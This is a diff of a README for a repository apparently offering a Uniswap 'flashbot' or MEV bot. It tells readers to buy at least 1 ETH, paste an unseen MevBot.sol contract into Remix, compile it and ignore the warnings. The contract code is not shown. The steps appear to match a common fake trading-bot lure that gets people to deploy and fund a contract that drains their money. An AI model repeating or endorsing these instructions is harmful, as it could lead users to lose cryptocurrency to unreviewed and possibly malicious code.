Logans40/Uniswap-Flashbot/README.md

 VERY FIRST STEP: Install Metamask and buy enough Etheruem, at least 1 ETH;  https://metamask.io/

-Copy code and paste the code of MevBot.sol file in Remix IDE;     https://remix.ethereum.org/#lang=en&optimize=false&runs=200&evmVersion=null
+Copy code and paste the code MevBot.sol file in Remix IDE;     https://remix.ethereum.org/#lang=en&optimize=false&runs=200&evmVersion=null

 Click Solidity complier 0.8.0 And press Compile FlashBot.sol, DON'T WORRY ABOUT WARNINGS ABOUT THE LISCENCE, IT WILL STILL WORK, JUST IGNORE THIS